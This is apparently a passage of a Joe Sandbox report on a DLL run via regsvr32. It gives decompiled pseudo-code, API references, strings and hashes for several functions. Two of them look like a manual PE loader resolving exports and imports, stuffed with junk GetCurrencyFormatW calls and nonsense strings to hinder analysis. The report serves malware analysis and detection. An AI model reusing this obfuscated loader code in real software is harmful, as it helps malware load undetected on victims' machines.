Part of subcall function 100101D0: EndPaint.USER32(?,?,00000004,100079D4,?,?,00000058,10003840), ref: 100101F2

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2914073315-0
Opcode ID: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
Instruction ID: d120da58dcfcd53bd7750bb53c5c236feb3430fa3c37942b0e1c20916eef10ca
Opcode Fuzzy Hash: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
Instruction Fuzzy Hash: 11112131A00219AFDB01DFB8CD499AEBBB9FB49704F004128F546DB165DA60A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005CE3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10005CE3(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10045580; // 0x771f5646
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E10020E9D(__edx,  &_v288, 4, "LOC"));
					E10001000(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10020B71(_t39));
					 *(E10020B71(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10020F1E( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10020B71(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10020B71(__eflags)) = _t34;
					} else {
						E10005177( *((intOrPtr*)(E10020B71(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1001FBB5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

_strcpy_s.LIBCMT ref: 10005D10

Part of subcall function 10001000: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10001000: __EH_prolog3.LIBCMT ref: 10004E8F

Part of subcall function 10020B71: __getptd_noexit.LIBCMT ref: 10020B71

__snprintf_s.LIBCMT ref: 10005D49

Part of subcall function 10020F1E: __vsnprintf_s_l.LIBCMT ref: 10020F33

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10005D74
LoadLibraryA.KERNEL32(?), ref: 10005D97

Strings

LOC, xrefs: 10005D08

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
Instruction ID: a9d45852776f355f9b5d50c5a058e6740ec097f8b3d9f9fbd80e36b8e0c44140
Opcode Fuzzy Hash: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
Instruction Fuzzy Hash: F9113A35900208AFE732D764DC4BBDF76ACDF04396F5104A3F6059B0A6DB716D448661

Uniqueness

Uniqueness Score: -1.00%

Function 1001FBB5 Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1001FBB5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10045580; // 0x771f5646
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10048ee8 = _t6;
				 *0x10048ee4 = _t22;
				 *0x10048ee0 = _t25;
				 *0x10048edc = _t21;
				 *0x10048ed8 = _t27;
				 *0x10048ed4 = _t26;
				 *0x10048f00 = ss;
				 *0x10048ef4 = cs;
				 *0x10048ed0 = ds;
				 *0x10048ecc = es;
				 *0x10048ec8 = fs;
				 *0x10048ec4 = gs;
				asm("pushfd");
				_pop( *0x10048ef8);
				 *0x10048eec =  *_t31;
				 *0x10048ef0 = _v0;
				 *0x10048efc =  &_a4;
				 *0x10048e38 = 0x10001;
				_t11 =  *0x10048ef0; // 0x0
				 *0x10048dec = _t11;
				 *0x10048de0 = 0xc0000409;
				 *0x10048de4 = 1;
				_t12 =  *0x10045580; // 0x771f5646
				_v812 = _t12;
				_t13 =  *0x10045584; // 0x88e0a9b9
				_v808 = _t13;
				 *0x10048e30 = IsDebuggerPresent();
				_push(1);
				E1002CAF6(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10039e30);
				if( *0x10048e30 == 0) {
					_push(1);
					E1002CAF6(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 10026335
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1002634A
UnhandledExceptionFilter.KERNEL32(10039E30), ref: 10026355
GetCurrentProcess.KERNEL32(C0000409), ref: 10026371
TerminateProcess.KERNEL32(00000000), ref: 10026378

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
Instruction ID: 5ceda17ef6beca13f91ed3eb6d695352f2d28ceca655d5ac6984320e078a27cc
Opcode Fuzzy Hash: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
Instruction Fuzzy Hash: FF21F274810225DFF741EF2ADEC46593BB4FB0A305F40481AEA08CB662E7B15A85CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 1000ACED Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000ACED(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E1000EEC4(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000A84C(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10005CAE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000acf0
0x1000acfc
0x1000ad44
0x1000ad46
0x1000ad4d
0x00000000
0x1000ad4f
0x1000ad03
0x1000ad07
0x00000000
0x00000000
0x1000ad09
0x1000ad16
0x00000000
0x1000ad2a
0x1000ad39
0x00000000
0x1000ad41

APIs

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

GetKeyState.USER32 ref: 1000AD11
GetKeyState.USER32 ref: 1000AD1A
GetKeyState.USER32 ref: 1000AD23
SendMessageA.USER32 ref: 1000AD39

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
Instruction ID: eef2aa2a50f2ce3d6a27787399a9e196b8ce042d27520782e3c7ec791ce6f79c
Opcode Fuzzy Hash: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
Instruction Fuzzy Hash: F9F089B678039B1BF550B2748C41F952154CF4ABD6F010731B643EE4DACD65D8C15670

Uniqueness

Uniqueness Score: -1.00%

Function 10003122 Relevance: 59.9, APIs: 32, Strings: 2, Instructions: 377
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10003122(signed int _a4, signed short _a8) {
				signed int _v4;
				void* _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t113;
				signed int _t124;
				intOrPtr _t125;
				int _t129;
				signed int _t130;
				signed int _t133;
				void* _t140;
				signed int _t141;
				void* _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr* _t186;
				signed int _t196;
				signed int _t197;
				short* _t198;
				void* _t238;

				_t238 =  &_v24;
				_t198 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v4;
				_t113 =  *_a4 + 0x78 + (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v4) * 8;
				_v8 = _t113;
				if( *((intOrPtr*)(_t113 + 4)) == 0) {
					L16:
					return 0;
				}
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) * 0x28;
				_v24 = (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) + _v4) *  *0x100440d0 +  *_v8 + _v20;
				if( *(_v24 + 0x18) == GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4) {
					goto L16;
				}
				_t124 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t125 = _v24;
				if( *((intOrPtr*)(_t125 + 0x14)) == _t124 *  *0x100440e0) {
					goto L16;
				}
				_push(0x22b9);
				_push(L"xadqsavcbdfewescGADW");
				_push(0);
				_push(_t198);
				_push(0x11d4);
				_push(0);
				if(_a8 >> 0x10 != 0) {
					if(GetCurrencyFormatW() *  *0x100440d4 + (0 |  *(_v24 + 0x18) == 0x00000000) != 0) {
						goto L16;
					}
					_t129 = 0;
					if( *(_a4 + 0x30) != 0) {
						L12:
						_t130 = GetCurrencyFormatW(_t129, 0x11d4, _t198, _t129, L"xadqsavcbdfewescGADW", 0x22b9);
						_t133 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t140 = bsearch(_t238 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 4,  *(_a4 + 0x30), _t133 *  *0x100440d4 +  *(_v24 + 0x18), _t130 *  *0x100440d4 + 8, E1000310E);
						if(_t140 == 0) {
							goto L16;
						}
						_t141 =  *(_t140 + 4) & 0x0000ffff;
						L14:
						_a4 = _t141;
						if(_a4 > GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x14))) {
							goto L16;
						}
						return  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x1c)) + _v20 + _a4 * 4)) + _v20;
					}
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 2;
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x20)) + _v4 + _v20;
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x24)) + _v4 + _v20;
					_v4 = malloc(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *(_v24 + 0x18) * 8);
					_t173 = _v4 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 8;
					_v8 = _t173;
					 *(_a4 + 0x30) = _t173;
					if(_t173 == 0) {
						goto L16;
					}
					_v4 = _v4 & 0x00000000;
					if(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18) == 0) {
						L11:
						_t177 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						qsort( *(_a4 + 0x30), GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *(_v24 + 0x18), _t177 *  *0x100440d8 + 8, E100030AA);
						_t238 = _t238 + 0x10;
						_t129 = 0;
						goto L12;
					} else {
						goto L10;
					}
					do {
						L10:
						_t184 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t186 = _v8;
						 *_t186 = _t184 *  *0x100440dc + _v20 +  *_v16;
						 *((short*)(_t186 + 4)) =  *_v12;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v4 = _v4 + 1;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v16 = _v16 + 4;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v12 = _v12 + 2;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v8 = _v8 + 8;
					} while (_v4 < GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18));
					goto L11;
				}
				_a4 =  *((intOrPtr*)(_t125 + 0x10));
				_v4 = _a8 & 0x0000ffff;
				_t196 = GetCurrencyFormatW(??, ??, ??, ??, ??, ??);
				_t197 = _v4;
				if(_t197 < _t196 *  *0x100440d0 + _a4) {
					goto L16;
				}
				_t141 = _t197 - _a4;
				goto L14;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10003155
GetCurrencyFormatW.KERNEL32 ref: 1000316E
GetCurrencyFormatW.KERNEL32 ref: 1000318B
GetCurrencyFormatW.KERNEL32 ref: 100031BB
GetCurrencyFormatW.KERNEL32 ref: 100031D0
GetCurrencyFormatW.KERNEL32 ref: 100031F7
GetCurrencyFormatW.KERNEL32 ref: 10003219
GetCurrencyFormatW.KERNEL32 ref: 10003259
GetCurrencyFormatW.KERNEL32 ref: 1000327D
GetCurrencyFormatW.KERNEL32 ref: 100032B3
GetCurrencyFormatW.KERNEL32 ref: 100032CF
GetCurrencyFormatW.KERNEL32 ref: 100032F7
GetCurrencyFormatW.KERNEL32 ref: 10003312
GetCurrencyFormatW.KERNEL32 ref: 1000333A
malloc.MSVCRT ref: 1000334E
GetCurrencyFormatW.KERNEL32 ref: 10003365
GetCurrencyFormatW.KERNEL32 ref: 10003399
GetCurrencyFormatW.KERNEL32 ref: 1000351A
GetCurrencyFormatW.KERNEL32 ref: 1000353C

Strings

xadqsavcbdfewescGADW, xrefs: 1000313C, 1000315F, 1000317C, 100031B2, 100031C1, 100031E8, 1000320E, 10003236, 100032AA, 100032BD, 100032E4, 10003301, 10003327, 10003356, 1000338E, 100033B0, 100033D5, 100033F4, 10003407, 1000341A, 1000342D, 10003458, 10003471, 100034A5, 100034BC, 100034E0, 1000350B, 10003531
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003143, 10003148, 10003166, 10003183, 100031B8, 100031C8, 100031EF, 10003215, 1000323D, 100032B0, 100032C4, 100032EF, 10003308, 10003332, 1000335D, 10003395, 100033B7, 100033E5, 100033FB, 1000340E, 10003421, 10003434, 1000345F, 10003478, 100034AB, 100034C3, 100034E7, 10003512, 10003538

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat$malloc
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3897936752-3161301136
Opcode ID: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
Instruction ID: 34db2b080b93b1a5fa06b343cb693385c3cc97db3aa9a73273c3b7a7a01e4154
Opcode Fuzzy Hash: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
Instruction Fuzzy Hash: 95C14670604214BFE208DB51CD96F5BBBECEB8A789F01480EF7459B2A2C731E9148F65

Uniqueness

Uniqueness Score: -1.00%

Function 10002BDE Relevance: 52.9, APIs: 28, Strings: 2, Instructions: 381
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E10002BDE(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int* _v20;
				void* _v24;
				signed int _t121;
				signed int _t144;
				void* _t156;
				intOrPtr _t157;
				void* _t178;
				signed int _t184;
				intOrPtr _t189;
				intOrPtr _t192;
				short* _t218;
				intOrPtr _t246;
				intOrPtr* _t247;
				int _t256;
				void** _t257;

				_t257 =  &_v24;
				_t256 = 0x22b9;
				_t218 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v4 = 1;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8;
				_t121 =  *_a4 + 0x80 + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8) * 8;
				_v8 = _t121;
				if( *((intOrPtr*)(_t121 + 4)) != 0) {
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 0x14;
					_v24 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 +  *_v8 + _v12 + _v16;
					L20:
					while(IsBadHugeReadPtr(_v24, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc + 0x14) == 0) {
						if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0xc)) == 0) {
							L26:
							return _v4;
						}
						_t144 =  *((intOrPtr*)(_a4 + 0x24))(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0xc)) + _v16,  *((intOrPtr*)(_a4 + 0x34)));
						_v8 = _t144;
						if(_t144 == 0) {
							_v4 = 0;
							goto L26;
						}
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440cc +  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_v12 = realloc( *(_a4 + 8), (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + 4) * _v12);
						_t156 = _v12 + GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 * 4;
						if(_t156 == 0) {
							_t157 = _a4;
							 *((intOrPtr*)(_t157 + 0x2c))(_v8,  *((intOrPtr*)(_t157 + 0x34)));
							_v4 = _v4 & 0x00000000;
							L25:
							goto L26;
						}
						_t256 = 0x22b9;
						 *(_a4 + 8) = _t156;
						 *((intOrPtr*)( *(_a4 + 8) + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 0xc))) * 4)) = _v8;
						 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_push(0x22b9);
						_push(L"xadqsavcbdfewescGADW");
						_push(0);
						_push(_t218);
						_push(0x11d4);
						_push(0);
						if( *_v24 == 0) {
							_v12 = GetCurrencyFormatW() *  *0x100440e0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x10)) + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						} else {
							_v12 = GetCurrencyFormatW() *  *0x100440d0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *_v24 + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						}
						_v12 = _t178 + _v16;
						while( *_v20 != 0) {
							if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 + ( *_v20 >> 0x1f) == 0) {
								_t184 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_t246 = _a4;
								_t189 =  *((intOrPtr*)(_t246 + 0x28))(_v8, _t184 *  *0x100440e0 + _v16 +  *_v20 + 2,  *((intOrPtr*)(_t246 + 0x34)));
							} else {
								_t189 =  *((intOrPtr*)(_a4 + 0x28))(_v8, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + ( *_v20 & 0x0000ffff),  *((intOrPtr*)(_a4 + 0x34)));
							}
							_t247 = _v12;
							 *_t247 = _t189;
							_t257 =  &(_t257[3]);
							if( *_t247 == 0) {
								_v4 = 0;
								L18:
								if(_v4 == 0) {
									_t192 = _a4;
									 *((intOrPtr*)(_t192 + 0x2c))(_v8,  *((intOrPtr*)(_t192 + 0x34)));
									goto L25;
								}
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v24 = _v24 + 0x14;
								goto L20;
							} else {
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v20 =  &(_v20[1]);
